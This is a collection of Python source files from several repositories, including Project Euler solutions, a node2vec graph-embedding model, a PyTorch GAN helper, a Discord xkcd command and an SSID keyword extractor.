18: 'eighteen',
20: 'twenty',
30: 'thirty',
40: 'forty',
50: 'fifty',
80: 'eighty',
1000: 'one thousand'
}
def number_name(number):
"""Return the full name, in letters, of a given number.
Args:
number: number whose name should be returned.
Returns:
the full name of that number (twenty-three, one hundred and two...), as
a string.
Raises:
ValueError: if number is not between 0 and 1000.
"""
if not isinstance(number, int):
raise TypeError("number is not an integer")
elif number < 0 or number > 1000:
raise ValueError("number out of range (must be between 0 and 1000)")
elif number in number_name_dictionary:
# return directly if it's simply a dictionary lookup -- used for
# exceptions and small numbers
return number_name_dictionary [number]
elif number > 10 and number < 20:
# sixteen, nineteen...
return number_name_dictionary [number - 10] + 'teen'
elif number >= 20 and number < 100:
# twenty-three, forty-nine...
if number // 10 * 10 in number_name_dictionary:
# exceptions for the tens: twenty, forty, fifty...
name = number_name_dictionary [number // 10 * 10]
else:
# regular tens: sixty, seventy...
name = number_name(number // 10) + 'ty'
if number % 10:
# if has a non-zero unit, add a dash, then the name of the units
# (twenty-three, ninety-eight...)
name += '-' + number_name(number % 10)
return name
elif number >= 100 and number < 1000:
# nine hundred, two hundred...
name = number_name(number // 100) + ' hundred'
# if has tens or units
if number % 100:
# add 'and ...', as in four hundred and ninety-eight
name += ' and ' + number_name(number % 100)
return name
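# e.g. number_name(342) == 'three hundred and forty-two' (23 letters ignoring spaces and hyphens)
# and number_name(115) == 'one hundred and fifteen' (20 letters), as in the problem statement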
```
#### File: project-euler/problems/021.py
```python
import helpers.prime as prime
MAX = 10000
def euler():
# accumulator for the sum
accumulator = 0
# for each value of a in the given range
for a in range(1, MAX):
        # calculate b = d(a), the sum of the proper divisors of a
b = d(a)
# if a and b are amicable
if b != 0 and d(b) == a and a < b:
# add them to the sum
accumulator += b + a
# return the sum accumulator
return accumulator
def d(number):
"""Return the sum of the divisors of a given number.
Divisors exclude the number itself, i.e.:
d(2) = 1 = 1
d(4) = 1 + 2 = 3
d(6) = 1 + 2 + 3 = 6
"""
return sum(prime.divisors(number)) - number
```
#### File: project-euler/problems/023.py
```python
# Find the sum of all the positive integers which cannot be written as the sum
# of two abundant numbers.
MAX = 28123
def euler():
abundants = {}
for number in range(1, MAX):
if is_abundant(number):
abundants [number] = True
accumulator = 0
for number in range(1, MAX):
is_a_sum = False
for abundant in abundants:
if (number - abundant) in abundants:
is_a_sum = True
break
if not is_a_sum:
accumulator += number
return accumulator
def list_of_abundants(highest_value):
"""Return the list of abundant numbers from 1 to the given number."""
abundant_list = []
for number in range(1, highest_value):
if is_abundant(number):
abundant_list.append(number)
return abundant_list
def sum_of_divisors(number):
"""Return the sum of the divisors of a given number."""
product = 1
divisor = 2
while divisor * divisor <= number:
multiplicand = 1
while number % divisor == 0:
multiplicand = multiplicand * divisor + 1
number //= divisor
product *= multiplicand
divisor += 1
if number > 1:
product *= 1 + number
return product
def is_abundant(number):
"""Return True iff the given number is abundant.
A number is abundant iff the sum of its divisors is higher than itself.
"""
return sum_of_divisors(number) > number + number
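# e.g. 12 is abundant: its proper divisors 1, 2, 3, 4 and 6 sum to 16 > 12,
# so sum_of_divisors(12) == 28 and 28 > 12 + 12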
```
#### File: project-euler/problems/026.py
```python
MAX = 1000
def euler():
# longest length for a cycle
longest_cycle_length = 0
# divisor that generates that cycle length
longest_cycle_divisor = 0
# for each divisor
for divisor in range(2, MAX):
# calculate the length of the fraction's cycle
cycle_length = fraction_cycle_length(divisor)
# if it's higher than any value seen before
if cycle_length > longest_cycle_length:
# keep in memory the cycle length, and which divisor generates it
longest_cycle_length = cycle_length
longest_cycle_divisor = divisor
# return the divisor that generates the longest cycle
return longest_cycle_divisor
def fraction_cycle_length(denominator):
"""Return the number of digits in the cycle part of a fraction.
For instance, in 1/3 (0.3333...), '3' is the recurring cycle. The length of
that cycle is 1.
    In 1/7 (0.142857142857142...), '142857' is the recurring cycle. The length of
the cycle is 6.
"""
# counter for the number of digits generated
digit_count = 0
# accumulator for the current number to be divided
accumulator = 1
# values encountered for the accumulator
accumulators = []
# while there is a remainder to the division
while accumulator != 0:
# if the current accumulator can be divided by the denominator
if accumulator >= denominator:
# the digit to add to the number is the result of that division
digit = accumulator // denominator
# if we have never had that accumulator before
if not accumulator in accumulators:
accumulators.append(accumulator)
else:
# if we have already met that accumulator before, return the
# number of digits between two occurences
return digit_count - accumulators.index(accumulator)
# subtract the result of the division from the accumulator
accumulator -= digit * denominator
# add a digit to the digit count
digit_count += 1
else:
# the current accumulator cannot be divided by the denominator,
# multiply it by 10
accumulator *= 10
# divides evenly, 0 cycle length
return 0
```
#### File: project-euler/problems/030.py
```python
POWER = 5
def euler():
accumulator = 0
for number in range(2, POWER * 9 ** POWER + 1):
if is_sum_of_power_digits(number, POWER):
accumulator += number
return accumulator
def is_sum_of_power_digits(number, power):
starting_number = number
accumulator = 0
while number > 0:
digit = number % 10
accumulator += digit ** power
number //= 10
return accumulator == starting_number
```
#### File: project-euler/problems/032.py
```python
import helpers.sequence as sequence
def euler():
products_cache = {}
accumulator = 0
for permutation in sequence.permutations('123456789'):
permutation = ''.join(permutation)
products = valid_products(permutation)
for product in products:
if not product in products_cache:
accumulator += product
products_cache [product] = True
return accumulator
def valid_products(permutation):
products = []
for split_1 in range(1, 5):
for split_2 in(5 - split_1, 4 - split_1):
if split_2 > 0:
split_2 += split_1
multiplicand = int(permutation [: split_1])
multiplier = int(permutation [split_1 : split_2])
product = int(permutation [split_2 :])
if multiplicand * multiplier == product:
products.append(product)
return products
```
#### File: project-euler/problems/033.py
```python
import fractions
def euler():
accumulator = fractions.Fraction(1, 1)
for digit_1 in range(1, 10):
for digit_2 in range(1, 10):
for digit_3 in range(1, 10):
if digit_1 != digit_2 or digit_1 != digit_3:
numerator = digit_1 * 10 + digit_2
denominator = digit_2 * 10 + digit_3
                    original_fraction = fractions.Fraction(numerator, denominator)
                    numerator = digit_1
                    denominator = digit_3
                    reduced_fraction = fractions.Fraction(numerator, denominator)
                    if original_fraction == reduced_fraction:
                        accumulator *= original_fraction
return accumulator.denominator
```
#### File: project-euler/problems/040.py
```python
import math
MAX = 1000000
def euler():
# calculate what the last needed number is
last_number = 0
size = 0
while size < MAX:
last_number += 1
size += int(math.log(MAX, 10))
# construct the string
string = ''.join(str(number) for number in range(1, MAX + 1))
# get the characters needed for calculations
digits = [string [i] for i in [0, 9, 99, 999, 9999, 99999, 999999]]
# calculate product of these digits
accumulator = 1
for digit in digits:
accumulator *= int(digit)
# return the product
return accumulator
```
#### File: project-euler/problems/042.py
```python
import helpers.file as fileutils
# arbitrary value for the highest reachable triangle number
MAX = 1000
def euler():
# set of the triangle numbers until an arbitrary maximum number
triangles = set()
# generate triangle numbers
n = 1
highest_triangle = 0
while highest_triangle < MAX:
highest_triangle = n * (n + 1) // 2
triangles.add(highest_triangle)
n += 1
# read the words and put them into a list of strings
words = fileutils.flattened_list_from_file('data/042.txt',
separator = ',', convert_to = str)
# strip the quote-sign from the strings, leaving only the word
words = [word.replace('"', '') for word in words]
# accumulator for the final answer, the number of triangle words
triangle_word_count = 0
# count the number of triangle words
for word in words:
if word_to_int(word) in triangles:
triangle_word_count += 1
# return it
return triangle_word_count
def word_to_int(word):
"""Returns the sum of the 'letter value' of each letter in the word.
('a' = 1, 'b' = 2, 'c' = 3, ...)"""
return sum(ord(letter) - ord('a') + 1 for letter in word.lower())
```
#### File: project-euler/problems/051.py
```python
import helpers.prime as prime
# number of replacements of digits that have to work
FAMILY_SIZE = 8
def euler():
# for each "starting" prime number
for prime_number in prime.primes(200000):
# list of integers for each digit
prime_number_digits = list(int(digit) for digit in str(prime_number))
# set (without duplicates) of the digits in the prime number
prime_number_digit_set = set(prime_number_digits)
# for each digit that could be replaced in the prime number
for base_digit in prime_number_digit_set:
# number of digit replacements that are actual prime numbers
prime_count = 0
# never replace the first digit with a zero
replacements = range(10) if prime_number_digits[0] != base_digit \
else range(1, 10)
# for each possible digit replacement
for replacement_digit in replacements:
# replace the digit base_digit with replacement_digit
modified_digits = replace(prime_number_digits, base_digit,
replacement_digit)
# convert that list to a number
modified_number = int(''.join(str(digit) \
for digit in modified_digits))
# if it's a prime, increment the prime count (duh)
if prime.is_prime(modified_number):
prime_count += 1
# return if the answer if we found it
if prime_count == FAMILY_SIZE:
return prime_number
def replace(xs, base, replacement):
"""Replaces every 'base' in 'xs' with 'replacement'. Non destructive.
Args:
xs: Initial list of elements.
base: Element to be replaced in the new list.
replacement: Element to replace that value with.
Returns:
A new list with the replacement applied."""
return [x if x != base else replacement for x in xs]
```
#### File: project-euler/problems/056.py
```python
MAX = 100
def euler():
highest_sum = 0
for a in range(1, MAX):
for b in range(1, MAX):
highest_sum = max(highest_sum, sum([int(c) for c in str(a ** b)]))
return highest_sum
```
#### File: project-euler/problems/061.py
```python
from math import sqrt
def euler():
# functions used to check the type of a number
predicates = [is_triangle, is_square, is_pentagonal, is_hexagonal,
is_heptagonal, is_octagonal]
for left in range(10, 100):
# try to construct a chain from this initial left-part for the number
c = chain([], left, predicates)
# if it worked, return the sum
if c:
return sum(c)
def chain(xs, left, predicates):
# `xs` is the constructed list
# `left` is the left part of the current number
# `predicates` is the list of predicates that aren't already verified by
# numbers in `xs`
if predicates == []:
# `xs` has the right number of elements, return it
return xs
rights = range(10, 100)
if len(predicates) == 1:
# if there is only one number left to guess, the right part of this
# number must be the left part of the first number
rights = [int(xs[0] / 100)]
for right in rights:
# construct the current number as "${left}${right}"
n = left * 100 + right
# no duplicates in `xs`
if n in xs:
continue
# check each predicate on the constructed number (n)
for predicate in predicates:
if predicate(n):
# remove the verified predicate from the list of predicates
new_predicates = list(predicates)
new_predicates.remove(predicate)
# try to advance recursively
c = chain(xs + [n], right, new_predicates)
# if it worked, return the returned value
if c:
return c
# failed to construct it
return None
def is_triangle(k):
n1 = (-1 + sqrt(1 + 8 * k)) / 2
return int(n1) == n1# or int(n2) == n2
def is_square(k):
return int(sqrt(k)) == sqrt(k)
def is_pentagonal(k):
n1 = (1 + sqrt(1 + 24 * k)) / 6
return int(n1) == n1# or int(n2) == n2
def is_hexagonal(k):
n1 = (0.5 + sqrt(0.25 + 2 * k)) / 2
return int(n1) == n1# or int(n2) == n2
def is_heptagonal(k):
n1 = (3 + sqrt(9 + 40 * k)) / 10
return int(n1) == n1# or int(n2) == n2
def is_octagonal(k):
n1 = (2 + sqrt(4 + 12 * k)) / 6
return int(n1) == n1# or int(n2) == n2
```
#### File: project-euler/problems/071.py
```python
HIGHEST_D = 10 ** 6
def euler():
m = 0
best_match = (2 / 7, None)
for d in range(2, HIGHEST_D):
if d % 7 != 0:
m += 1
n = m // 2
if n / d > best_match[0]:
best_match = (n / d, n)
return best_match[1]
```
#### File: project-euler/problems/072.py
```python
def euler():
MAX = 10 ** 6
# at the end, this table will contain all the values for totients
table = list(range(MAX + 1))
match_count = 0
    # there are totient(p) reduced fractions for each denominator p
for p in range(2, MAX + 1):
if table[p] == p:
# this number is prime: multiply each of is multiples by (1 - 1 / p)
for q in range(p, MAX + 1, p):
table[q] *= 1 - 1 / p
# add totient(p) to the number of matches
match_count += table[p]
# return the number of matches, as an integer
return round(match_count)
```
#### File: project-euler/problems/073.py
```python
import helpers.prime as prime
import math
DELTA = 0.0001
MAX = 12000
def euler():
# number of fractions found
match_count = 0
# for each possible numerator n
for n in range(2, math.ceil(MAX / 2) + 1):
# lowest possible denominator for a fraction in the wanted range
start = math.ceil(2 * n + DELTA)
# highest possible denominator for a fraction in the wanted range
end = min(MAX, int(3 * n - DELTA))
# construct a dictionary whose keys are all the denominators that
# do *not* make a reduced fraction with the numerator n
table = dict()
for p in prime.prime_factors(n):
for q in range(p, end + 1, p):
table[q] = True
# for each denominator d
for d in range(start, end + 1):
# if n / d is a reduced fraction
if not d in table:
match_count += 1
# return the number of fractions found
return match_count
```
#### File: project-euler/problems/075.py
```python
import helpers.discreet as discreet
LIMIT = 1500000
def euler():
table = {}
m = 2
while 2 * m * m < LIMIT:
for n in range(1, m):
if (m - n) % 2 == 1 and discreet.gcd(m, n) == 1:
a = m * m - n * n
b = 2 * m * n
c = m * m + n * n
l = a + b + c
for L in range(l, LIMIT, l):
if L in table:
table[L] += 1
else:
table[L] = 1
m += 1
match_count = 0
for k in table:
if table[k] == 1:
match_count += 1
return match_count
```
#### File: project-euler/problems/078.py
```python
DIVISOR = 1000000
def euler():
n = 2
# this is valid since partition(n) returns a value with a modulo applied
while partition(n) != 0:
n += 1
return n
# list of partitions, used by partition(), and indirectly by next_p
ps = [0, 1]
# partition function; see Euler's pentagonal number theorem
#
# N.B.: all calculations are made with modulo DIVISOR
def partition(n):
n += 1
i = len(ps)
while i <= n:
ps.append(next_p(i, ps) % DIVISOR)
i += 1
return ps[n]
# helper function for partition(): calculate the next partition
#
# N.B.: all calculations are made with modulo DIVISOR
def next_p(n, ps):
acc = 0
for dk in (-1, 1):
k = dk
q = pentagonal(k)
while q < n:
acc += int(((-1) ** (k - 1)) * ps[n - q])
k += dk
q = pentagonal(k)
return acc % DIVISOR
# helper function for partition(): calculate the k-th pentagonal number
#
# N.B.: all calculations are made with modulo DIVISOR
def pentagonal(k):
return int(k * (3 * k - 1) / 2) % DIVISOR
```
#### File: project-euler/problems/080.py
```python
MAX = 100
# uses the algorithm for digit-by-digit calculation, as described on Wikipedia:
# http://en.wikipedia.org/wiki/Methods_of_computing_square_roots#Digit-by-digit_calculation
def euler():
acc = 0
# for each starting number
for c in range(2, MAX):
acc += square_root_digit_sum(c)
return acc
# return the sum of the first 100 digits in the irrational square root sqrt(c)
#
# if sqrt(c) is rational, returns 0
def square_root_digit_sum(c):
# number representing the digits of the root
p = 0
i = 0
# True iff the root is rational
rational = False
# for each of the first 100 digits
while i < 100:
i += 1
# calculate the current value for x and y
x = guess_x(p, c)
y = x * (20 * p + x)
# add x as a digit to p
p = 10 * p + x
# subtract y from c, and move it two digits to the left
c -= y
c *= 100
# if c is 0, it is rational; just return 0
if c == 0:
return 0
# return the sum of the digits found
return sum(int(d) for d in str(p))
# helper function for calculating the next digit of the square root
def guess_x(p, c):
# guess the value of x by "brute force"
# x is the highest integer that satisfies x(20p + x) <= c, and is going to be
# the next digit to add to the square root
x = 1
while x * (20 * p + x) <= c:
x += 1
return x - 1
```
#### File: project-euler/problems/085.py
```python
MAX = 2000
# the "target" we are trying to reach
TARGET = 2000000
def euler():
# (area, difference) tuple for the best match
best_match = (0, 2000000)
# for each possible width/height
for height in range(1, MAX + 1):
for width in range(1, height + 1):
# the number of sub-rectangles is t(w)*t(h)
rectangles = triangular(height) * triangular(width)
# if it is closer to TARGET than previous best match, this is the
# new best match
if abs(TARGET - rectangles) < best_match[1]:
best_match = (height * width, abs(TARGET - rectangles))
# return the area for the best match
return best_match[0]
# return the nth triangular number
def triangular(n):
return n * (n + 1) // 2
``` |
{
"source": "612twilight/CogDL-TensorFlow",
"score": 2
} |
#### File: models/emb/node2vec.py
```python
import numpy as np
import networkx as nx
from gensim.models import Word2Vec, KeyedVectors
import random
import time
from .. import base_model, register_model, alias_draw, alias_setup
@register_model("node2vec")
class Node2vec(base_model.BaseModel):
@staticmethod
def add_args(parser):
"""Add model-specific arguments to the parser."""
# fmt: off
parser.add_argument('--walk-length', type=int, default=80,
help='Length of walk per source. Default is 80.')
parser.add_argument('--walk-num', type=int, default=40,
help='Number of walks per source. Default is 40.')
parser.add_argument('--window-size', type=int, default=5,
help='Window size of skip-gram model. Default is 5.')
parser.add_argument('--worker', type=int, default=10,
help='Number of parallel workers. Default is 10.')
parser.add_argument('--iteration', type=int, default=10,
help='Number of iterations. Default is 10.')
parser.add_argument('--p_value', type=float, default=1.0,
help='Parameter in node2vec. Default is 1.0.')
# use p_value instead of p to avoid conflict with argument patience, since the abbr of patience is p
parser.add_argument('--q_value', type=float, default=1.0,
help='Parameter in node2vec. Default is 1.0.')
# fmt: on
@classmethod
def build_model_from_args(cls, args):
return cls(
args.hidden_size,
args.walk_length,
args.walk_num,
args.window_size,
args.worker,
args.iteration,
args.p_value,
args.q_value,
)
def __init__(
self, dimension, walk_length, walk_num, window_size, worker, iteration, p, q
):
super(Node2vec, self).__init__()
self.dimension = dimension
self.walk_length = walk_length
self.walk_num = walk_num
self.window_size = window_size
self.worker = worker
self.iteration = iteration
self.p = p
self.q = q
def train(self, G):
self.G = G
is_directed = nx.is_directed(self.G)
for i, j in G.edges():
G[i][j]["weight"] = G[i][j].get("weight", 1.0)
if not is_directed:
G[j][i]["weight"] = G[j][i].get("weight", 1.0)
self._preprocess_transition_probs()
walks = self._simulate_walks(self.walk_num, self.walk_length)
walks = [[str(node) for node in walk] for walk in walks]
model = Word2Vec(
walks,
size=self.dimension,
window=self.window_size,
min_count=0,
sg=1,
workers=self.worker,
iter=self.iteration,
)
id2node = dict([(vid, node) for vid, node in enumerate(G.nodes())])
self.embeddings = np.asarray(
[model[str(id2node[i])] for i in range(len(id2node))]
)
return self.embeddings
def _node2vec_walk(self, walk_length, start_node):
# Simulate a random walk starting from start node.
G = self.G
alias_nodes = self.alias_nodes
alias_edges = self.alias_edges
walk = [start_node]
while len(walk) < walk_length:
cur = walk[-1]
cur_nbrs = list(G.neighbors(cur))
if len(cur_nbrs) > 0:
if len(walk) == 1:
walk.append(
cur_nbrs[alias_draw(alias_nodes[cur][0], alias_nodes[cur][1])]
)
else:
prev = walk[-2]
next = cur_nbrs[
alias_draw(
alias_edges[(prev, cur)][0], alias_edges[(prev, cur)][1]
)
]
walk.append(next)
else:
break
return walk
def _simulate_walks(self, num_walks, walk_length):
# Repeatedly simulate random walks from each node.
G = self.G
walks = []
nodes = list(G.nodes())
print("Walk iteration:")
for walk_iter in range(num_walks):
if walk_iter % 10 == 0:
print(str(walk_iter + 1), "/", str(num_walks))
random.shuffle(nodes)
for node in nodes:
walks.append(
self._node2vec_walk(walk_length=walk_length, start_node=node)
)
return walks
def _get_alias_edge(self, src, dst):
# Get the alias edge setup lists for a given edge.
G = self.G
unnormalized_probs = []
for dst_nbr in G.neighbors(dst):
if dst_nbr == src:
unnormalized_probs.append(G[dst][dst_nbr]["weight"] / self.p)
elif G.has_edge(dst_nbr, src):
unnormalized_probs.append(G[dst][dst_nbr]["weight"])
else:
unnormalized_probs.append(G[dst][dst_nbr]["weight"] / self.q)
norm_const = sum(unnormalized_probs)
normalized_probs = [float(u_prob) / norm_const for u_prob in unnormalized_probs]
return alias_setup(normalized_probs)
def _preprocess_transition_probs(self):
# Preprocessing of transition probabilities for guiding the random walks.
G = self.G
is_directed = nx.is_directed(self.G)
print(len(list(G.nodes())))
print(len(list(G.edges())))
s = time.time()
alias_nodes = {}
for node in G.nodes():
unnormalized_probs = [G[node][nbr]["weight"] for nbr in G.neighbors(node)]
norm_const = sum(unnormalized_probs)
normalized_probs = [
float(u_prob) / norm_const for u_prob in unnormalized_probs
]
alias_nodes[node] = alias_setup(normalized_probs)
t = time.time()
print("alias_nodes", t - s)
alias_edges = {}
s = time.time()
if is_directed:
for edge in G.edges():
alias_edges[edge] = self._get_alias_edge(edge[0], edge[1])
else:
for edge in G.edges():
alias_edges[edge] = self._get_alias_edge(edge[0], edge[1])
alias_edges[(edge[1], edge[0])] = self._get_alias_edge(edge[1], edge[0])
t = time.time()
print("alias_edges", t - s)
self.alias_nodes = alias_nodes
self.alias_edges = alias_edges
return
```
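`alias_setup` and `alias_draw` above are imported from the package and are not part of this excerpt. As a rough reference only, a minimal self-contained sketch of the standard Walker alias method they presumably implement (O(n) table construction, O(1) sampling) could look like the following; the details are illustrative assumptions, not the repository's actual code:
```python
import numpy as np
def alias_setup(probs):
    # Build the alias table for the discrete distribution given by `probs`.
    n = len(probs)
    q = np.asarray(probs, dtype=np.float64) * n  # scaled probabilities
    J = np.zeros(n, dtype=np.int64)              # alias indices
    smaller = [i for i, val in enumerate(q) if val < 1.0]
    larger = [i for i, val in enumerate(q) if val >= 1.0]
    while smaller and larger:
        small, large = smaller.pop(), larger.pop()
        J[small] = large
        q[large] = q[large] + q[small] - 1.0
        (smaller if q[large] < 1.0 else larger).append(large)
    return J, q
def alias_draw(J, q):
    # Draw one sample in O(1): pick a column uniformly, then keep it or jump to its alias.
    i = int(np.floor(np.random.rand() * len(J)))
    return i if np.random.rand() < q[i] else J[i]
```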
#### File: CogDL-TensorFlow/tests/test_line.py
```python
import os
import sys
sys.path.append('../')
def test_line():
os.system("python ../scripts/train.py --task unsupervised_node_classification --dataset wikipedia --model line --seed 0 1 2 3 4")
pass
if __name__ == "__main__":
test_line()
``` |
{
"source": "6148Authours/MOC",
"score": 2
} |
#### File: src/utils/gan.py
```python
import copy
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
# Here we use a function to avoid reuse of objects
DEFAULT_GAN_CONFIGS = lambda: {
'batch_size': 64,
'generator_output_activation': 'tanh',
'generator_hidden_activation': 'relu',
'discriminator_hidden_activation': 'leaky_relu',
'generator_optimizer': torch.optim.RMSprop,
'discriminator_optimizer': torch.optim.RMSprop,
'generator_weight_initializer': nn.init.xavier_normal_,
'discriminator_weight_initializer': nn.init.xavier_normal_,
'print_iteration': 50,
'reset_generator_optimizer': False,
'reset_discriminator_optimizer': False,
'batch_normalize_discriminator': False,
'batch_normalize_generator': False,
'supress_all_logging': False,
'default_generator_iters': 1, # It is highly recommend to not change these parameters
'default_discriminator_iters': 1,
'gan_type': 'lsgan',
'wgan_gradient_penalty': 0.1,
}
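# Calling DEFAULT_GAN_CONFIGS() returns a fresh dict each time, so per-instance updates never mutate a shared default.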
class Generator(nn.Module):
def __init__(self, output_size, hidden_layers, noise_size, configs):
super(Generator, self).__init__()
self.configs = configs
self.layers = nn.ModuleList()
self.batch_norm = configs['batch_normalize_generator']
previous_size = noise_size
        for size in hidden_layers:
            self.layers.append(nn.Linear(previous_size, size))
            if configs['generator_hidden_activation'] == 'relu':
                self.layers.append(nn.ReLU())
            elif configs['generator_hidden_activation'] == 'leaky_relu':
                self.layers.append(nn.LeakyReLU(0.2))
            else:
                raise ValueError('Unsupported activation type')
            if self.batch_norm:
                # batch norm is registered here as a module so forward() can simply apply it
                self.layers.append(nn.BatchNorm1d(size))
            previous_size = size
self.layers.append(nn.Linear(previous_size, output_size))
        if configs['generator_output_activation'] == 'tanh':
            self.layers.append(nn.Tanh())
        elif configs['generator_output_activation'] == 'sigmoid':
            self.layers.append(nn.Sigmoid())
        else:
            raise ValueError('Unsupported activation type!')
    def forward(self, x):
        # all layers, including the optional batch-norm modules, are registered in __init__
        for layer in self.layers:
            x = layer(x)
        return x
class DiscriminatorNet(nn.Module):
def __init__(self, input_size, hidden_layers, output_size, configs):
super(DiscriminatorNet, self).__init__()
        previous_size = input_size
        self.layers = nn.ModuleList()
        self.batch_norm = configs['batch_normalize_discriminator']
        for size in hidden_layers:
            self.layers.append(nn.Linear(previous_size, size))
            if configs['discriminator_hidden_activation'] == 'relu':
                self.layers.append(nn.ReLU())
            elif configs['discriminator_hidden_activation'] == 'leaky_relu':
                self.layers.append(nn.LeakyReLU(0.2))
            else:
                raise ValueError('Unsupported activation type')
            if self.batch_norm:
                self.layers.append(nn.BatchNorm1d(size))
            previous_size = size
        self.layers.append(nn.Linear(previous_size, output_size))
    def forward(self, x):
        # all layers, including the optional batch-norm modules, are registered in __init__
        for layer in self.layers:
            x = layer(x)
        return x
class Discriminator(nn.Module):
def __init__(self, generator_output, input_size, hidden_layers, output_size, configs):
super(Discriminator, self).__init__()
self._generator_input = generator_output
self.configs = configs
self.sample_discriminator = DiscriminatorNet(input_size, hidden_layers, output_size, configs)
self.generator_discriminator = DiscriminatorNet(input_size, hidden_layers, output_size, configs)
def forward(self, x):
return self.sample_discriminator(x), self.generator_discriminator(x)
def batch_feed_array(array, batch_size):
    data_size = array.shape[0]
    if data_size <= batch_size:
        while True:
            yield array
    else:
        start = 0
        while True:
            if start + batch_size <= data_size:
                yield array[start:start + batch_size]
                start += batch_size
            else:
                start = 0
class FCGAN(object):
def __init__(self, generator_output_size, discriminator_output_size, generator_layers, discriminator_layers,
noise_size, configs=None):
self.generator_output_size = generator_output_size
self.discriminator_output_size = discriminator_output_size
self.noise_size = noise_size
        self.configs = copy.deepcopy(DEFAULT_GAN_CONFIGS())  # DEFAULT_GAN_CONFIGS is a factory function; call it for a fresh dict
if configs is not None:
self.configs.update(configs)
self.generator = Generator(generator_output_size, generator_layers, noise_size, self.configs)
        # the Discriminator only stores this reference, so pass the generator module itself
        self.discriminator = Discriminator(self.generator, generator_output_size, discriminator_layers,
                                           discriminator_output_size, self.configs)
self.generator_train_op = self.configs['generator_optimizer'](self.generator.parameters())
self.discriminator_train_op = self.configs['discriminator_optimizer'](self.discriminator.parameters())
def sample_random_noise(self, size):
return np.random.randn(size, self.noise_size)
def sample_generator(self, size):
generator_samples = []
generator_noise = []
batch_size = self.configs['batch_size']
for i in range(0, size, batch_size):
sample_size = min(batch_size, size - i)
noise = self.sample_random_noise(sample_size)
generator_noise.append(noise)
            # sample from the generator by running it on the noise batch
            with torch.no_grad():
                samples = self.generator(torch.as_tensor(noise, dtype=torch.float32))
            generator_samples.append(samples.cpu().numpy())
return np.vstack(generator_samples), np.vstack(generator_noise)
def train(self, X, Y, outer_iers, generator_iters=None, discriminator_iters=None):
if generator_iters is None:
generator_iters = self.configs['default_generator_iters']
if discriminator_iters is None:
discriminator_iters = self.configs['default_discriminator_iters']
sample_size = X.shape[0]
train_size = sample_size
batch_size = self.configs['batch_size']
generated_Y = np.zeros((batch_size, self.discriminator_output_size))
batch_feed_X = batch
``` |
{
"source": "615/VulnPoC",
"score": 3
} |
#### File: VulnPoC/lib/common.py
```python
import os,sys
import urllib,urllib2
import re
import urlparse,random
from settings import Banner
sys.dont_write_bytecode = True
def dataStdout(message):
    sys.stdout.write(message)
def banner():
    _ = Banner[random.randint(0, 2)]
    dataStdout(_)
``` |
{
"source": "6180/foxybot",
"score": 3
} |
#### File: foxybot/commands/xkcd.py
```python
import aiohttp
import requests
from discord import Embed
from command import AbstractCommand, bot_command
@bot_command
class Xkcd(AbstractCommand):
_aliases = ['xkcd']
async def execute(self, shards, client, msg):
# TODO: allow specifying a numbered comic or search term to retrieve
async with aiohttp.ClientSession() as session:
async with session.get('http://c.xkcd.com/random/comic/') as resp:
url = resp.url
async with session.get(f'{url}/info.0.json') as resp:
comic = await resp.json()
embed = Embed()
embed.colour = 0x6699FF
embed.set_author(name=comic['title'], url=f"https://xkcd.com/{comic['num']}/")
embed.set_image(url=comic['img'])
embed.set_footer(text=comic['alt'])
await msg.channel.send(embed=embed)
@property
def aliases(self):
return self._aliases
``` |
{
"source": "6180/ranger-bot",
"score": 3
} |
#### File: ranger/commands/_template_command.py
```python
class Command():
    # List of the handles this command is invokable with.
_aliases = [
"main_name",
"another_name"
]
# Text to show in the bot help dialog.
_help = "This is what this command does: stuff!"
# If `False` anyone can use this command. If `True` only people with the
# `administrator` privilege can use it.
_privileged = True
# If `True` only the bot owner can use the command.
_op_priv = False
# Argument parser for complex commands
parser = None
@staticmethod
async def execute(client, msg):
await msg.channel.send(msg.content)
``` |
{
"source": "619561504/python-study",
"score": 3
} |
#### File: 619561504/python-study/wifi_key.py
```python
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import operator
# Search two strings for their longest common contiguous substring; return the substring (and its length)
def find_lccs_substr(s1, s2):
    m=[[0 for i in range(len(s2)+1)] for j in range(len(s1)+1)] # zero matrix; one extra row/column beyond the string lengths to simplify the DP
    mmax=0 # length of the longest match
    p=0 # index of the last character of the longest match in s1
for i in range(len(s1)):
for j in range(len(s2)):
if s1[i]==s2[j]:
m[i+1][j+1]=m[i][j]+1
if m[i+1][j+1]>mmax:
mmax=m[i+1][j+1]
p=i+1
if s1:
        return s1[p-mmax:p].decode('utf-8')#,mmax # return the longest substring (uncomment ,mmax to also return its length)
# Get the list of keys with the top-N values
def find_topN_value_key(dictA,topn):
list_N =[]
if dictA:
for i in range(0,topn):
max_value_key = max(dictA.iteritems(), key=operator.itemgetter(1))[0]
list_N.append(max_value_key)
            dictA.pop(max_value_key) # remove the current max key/value so the next iteration finds the next-largest
if not dictA:
break
return list_N
# Extract keyword strings from the SSIDs of one shop's dict
def extract_keywords(dict_ssid,topn): # dict_ssid is a dict like {ssid1:cnt1,ssid2:cnt2,...}
# length = len(list_ssid)
# dict_key_cnt = {} #{key1:cnt1,key2:cnt2,……}
# for i in range(0,length-1): #1->2,2->3,n-1->n
# for j in range(i+1,length):
# lscc_result = find_lccs_substr(list_ssid[i],list_ssid[j])
    #         key_ssid = lscc_result[0] # longest common substring
    #         #key_length = lscc_result[1] # length of the longest common substring
# if len(key_ssid)>2:
# if key_ssid in dict_key_cnt.keys():
# dict_key_cnt[key_ssid] = dict_key_cnt[key_ssid] + 1
# else :
# dict_key_cnt[key_ssid] = 1
    list_ssid = dict_ssid.keys() # all SSIDs of one shop
    length = len(list_ssid)
    dict_key_cnt = {} # {key1:cnt1,key2:cnt2,...}
    for i in range(0,length-1): # compare pairs 1->2, 2->3, ..., n-1->n
for j in range(i+1,length):
lscc_result = find_lccs_substr(list_ssid[i],list_ssid[j])
if lscc_result:
                key_ssid = lscc_result # longest common substring (find_lccs_substr returns the substring)
                #key_length = lscc_result[1] # length of the longest common substring
if len(key_ssid)>2:
if key_ssid in dict_key_cnt.keys():
m = dict_ssid[list_ssid[i]]
n = dict_ssid[list_ssid[j]]
dict_key_cnt[key_ssid] = int(dict_key_cnt[key_ssid]) + int(m) + int(n)
else :
m = dict_ssid[list_ssid[i]]
n = dict_ssid[list_ssid[j]]
dict_key_cnt[key_ssid] = int(m)+int(n)
    # output dict {string1:cnt1,string2:cnt2,...}
# print 'output dict_key_cnt:'
# for key, value in dict_key_cnt.iteritems():
# print key,value
list_keys = find_topN_value_key(dict_key_cnt,topn)
return list_keys
